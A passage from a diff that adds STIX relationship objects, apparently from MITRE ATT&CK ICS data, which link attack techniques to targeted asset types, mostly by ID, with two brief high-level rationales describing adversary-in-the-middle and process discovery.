"x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--004329dd-2f92-40c2-87db-cb920c11da4f", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--8e350c1d-ac79-4b5c-bd4e-7476d7e84ec5", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0047bb3d-b5fa-4726-8b4c-4a5bbd590a7e", + "created": "2024-06-27T09:33:16.486Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:33:16.486Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--004bfbd6-91fc-4ee9-a414-1c8baae955b8", + "created": "2024-06-21T14:12:20.263Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.263Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "target_ref": "x-mitre-asset--37fd65ed-2f82-4b94-9f70-5540d4fe6866", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0074496b-286f-450b-86b5-b5a0a3cc27fe", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--a93494bb-4b80-4ea1-8695-3236a49916fd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--007a2c53-fc5c-4750-aff0-defb282e178a", + "created": "2023-09-29T16:30:30.829Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:30:30.829Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--53a26eee-1080-4d17-9762-2027d5a1b805", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--00814703-3c3b-4872-89e9-cea4ba5edf2d", + "created": "2020-02-11T20:36:06.423Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-04-25T14:00:00.188Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--8d7bd4f5-3a89-4453-9c82-2c8894d5655e", + "target_ref": "attack-pattern--435dfb86-2697-4867-85b5-2fef496c0517", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--008e82ae-654b-48a5-b633-7fc98c851b99", + "created": "2024-07-02T13:55:55.760Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.760Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--00aef3f2-ddd6-489b-a5ba-e4c508ea3a38", + "created": "2024-07-02T13:55:55.753Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.753Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--00d0e755-693d-46c0-b659-7ae11d22ae31", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--00d166a1-cc7f-4889-940c-fa3ebdfd08b1", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--613d08bc-e8f4-4791-80b0-c8b974340dfd", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--00e43630-5236-4929-bdd6-9f0117887bb2", + "created": "2024-06-27T09:23:30.920Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:23:30.920Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ed2e45f9-d338-4eb2-8ce5-3a2e03323bc1", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--00ee14fc-2de4-4c99-b9cb-e2e23ed273fa", + "created": "2024-07-02T13:55:55.751Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.751Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0101b8f9-5b15-4c5a-b841-391dc953d6cf", + "created": "2024-07-02T13:55:55.749Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.749Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--635cbe30-392d-4e27-978e-66774357c762", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--010f86d5-9292-485a-ad86-9c557e6ee5fa", + "created": "2024-07-02T13:55:55.755Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.755Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a60a291-8960-4387-8a4a-2ab5c18bb50b", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--011f1d16-c9f1-48ac-94f1-165466c155f8", + "created": "2023-09-29T18:43:33.176Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:43:33.176Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--012fd76f-1a10-4e48-9306-10ffae3f61dd", + "created": "2023-09-29T16:30:58.431Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T16:30:58.431Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "target_ref": "x-mitre-asset--973bc51e-c41e-4cec-ac03-9389c71f3d0d", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--01335508-22bb-4185-a7e2-49ec9bee6423", + "created": "2023-09-28T20:15:20.293Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-28T20:15:20.293Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--75f810ad-b678-4c57-b93b-fdc79bba0c04", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0136aba4-10d4-4d23-852e-7e70f1cdcd1d", + "created": "2024-07-02T13:55:55.761Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.761Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--be055942-6e63-49d7-9fa1-9cb7d8a8f3f4", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--013f6bf4-fbc0-47dd-b482-7a380677a03b", + "created": "2024-06-27T09:07:09.632Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-27T09:07:09.632Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "target_ref": "x-mitre-asset--dcb786af-f1e7-449e-be48-46315c9789ca", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--01509c65-a560-4199-8152-1c2512f3c729", + "created": "2024-06-21T14:12:20.274Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.274Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b6301b64-ef57-4cce-bb0b-77026f14a8db", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--01558032-067e-447a-bedf-0fca0404e3ca", + "created": "2024-07-02T13:55:55.759Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.759Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--3fc9b85a-2862-4363-a64d-d692e3ffbee0", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--01a008df-133a-4163-a161-97ac78d6d5b7", + "created": "2024-06-21T14:12:20.277Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.277Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--01b02a73-ea13-4732-b48a-cbdd4db5cd84", + "created": "2024-07-02T13:55:55.765Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.765Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--7dd95ff6-712e-4056-9626-312ea4ab4c5e", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--01bb8941-ce67-47c3-bf00-35d83303e5c2", + "created": "2024-07-02T13:55:55.762Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.762Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--09a60ea3-a8d1-4ae5-976e-5783248b72a4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--01d002a2-696a-4e22-b227-b0b32f54eaf0", + "created": "2023-09-29T18:42:27.894Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T18:42:27.894Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "target_ref": "x-mitre-asset--f1315d02-9118-4e3b-8cdf-4c2d3f77ce41", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--01e3fc9f-a336-4316-bec9-31c21ea02f0b", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--b2d03cea-aec1-45ca-9744-9ee583c1e1cc", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--020c7d6e-34ab-4786-b4c0-7322af047f8b", + "created": "2024-06-21T14:12:20.275Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-21T14:12:20.275Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--c726e0a2-a57a-4b7b-a973-d0f013246617", + "target_ref": "x-mitre-asset--5029a500-3fc9-49db-825f-932ac0fc21ad", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--02117d44-46d2-41f0-a5fb-ba303e6ee124", + "created": "2023-09-29T18:55:47.037Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2024-05-23T19:40:55.153Z", + "description": "Asset Mapping Rationale: Adversaries may attempt to position themselves between two or more networked devices using an adversary-in-the-middle (AiTM) technique. By abusing features of common networking protocols that can determine the flow of network traffic (e.g. ARP, DNS, LLMNR, etc.), adversaries may force a device to communicate through an adversary controlled system so they can collect information or perform additional actions.", + "relationship_type": "targets", + "source_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--02131a7c-d048-47b6-94ab-35e1869b2d65", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0613359-5781-4fd2-b5be-c269270be1f6", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--022d4d7d-43b9-4287-9081-19f7a68783e7", + "created": "2024-06-26T13:40:02.234Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:40:02.234Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--438c967d-3996-4870-bfc2-3954752a1927", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--02474bbb-0e31-41fa-ace4-e916cb74bf47", + "created": "2024-06-26T13:37:08.497Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T13:37:08.497Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--6fa224c7-5091-4595-bf15-3fc9fe2f2c7c", + "target_ref": "x-mitre-asset--2821ca87-8f61-47e5-a3bf-524f65573d77", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--02573a7b-ae29-4bac-bd18-53b1f6d78452", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--2aed01ad-3df3-4410-a8cb-11ea4ded587c", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--026014cb-4b1b-4391-86bc-ce541b9bb288", + "created": "2024-07-02T13:55:55.752Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.752Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--191cc6af-1bb2-4344-ab5f-28e496638720", + "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--0266f12c-89f0-40ae-b9f0-8b2ee2c17e98", + "created": "2024-06-26T14:36:20.404Z", + "created_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-06-26T14:36:20.404Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--35d30338-5bfa-41b0-a170-ec06dfd75f64", + "target_ref": "x-mitre-asset--65c04f96-37e5-4358-ab16-087e240c1b6e", + "x_mitre_modified_by_ref": "identity--c9819289-ba54-424a-b869-e4387b5f51b0", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--026ba3e5-ae3b-4a8b-83c0-ea8327cd9e50", + "created": "2023-09-29T17:42:44.516Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-09-29T17:42:44.516Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d5a69cfb-fc2a-46cb-99eb-74b236db5061", + "target_ref": "x-mitre-asset--68388d4f-8138-420b-be2b-5a7dfe9ff6b4", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--028e27f9-ee7d-436d-b777-0e4e57f80959", + "created": "2024-07-02T13:55:55.771Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.771Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4", + "target_ref": "x-mitre-asset--1769c499-55e5-462f-bab2-c39b8cd5ae32", + "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--02c0faf7-6969-420f-b9d8-b8eacfefb61e", + "created": "2024-05-22T17:25:32.818Z", + "created_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-05-23T19:43:58.513Z", + "description": "Asset Mapping Rationale: Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. On network devices, Network Device CLI commands such as show processes can be used to display current running processes.", + "relationship_type": "targets", + "source_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580", + "target_ref": "x-mitre-asset--dcb1d1c1-b195-45bf-b4cf-5b98c5b859a5", + "x_mitre_modified_by_ref": "identity--c372c93e-faf6-4269-9ca9-90dff6035730", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.2.0" + }, + { + "type": "relationship", + "spec_version": "2.1", + "id": "relationship--02c473fa-01e3-436e-8c73-a3abf7cd55d7", + "created": "2024-07-02T13:55:55.750Z", + "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", + "revoked": false, + "external_references": [], + "object_marking_refs": [], + "modified": "2024-07-02T13:55:55.750Z", + "description": "", + "relationship_type": "targets", + "source_ref": "attack-pattern--86a96bf6-cf8b-411c-aaeb-8959944d64f7", + "target_ref": "x-mitre-asset--0804f037-a3b9-4715-98e1-9f73d19d6945", + "x_mitre_modified_by_ref": 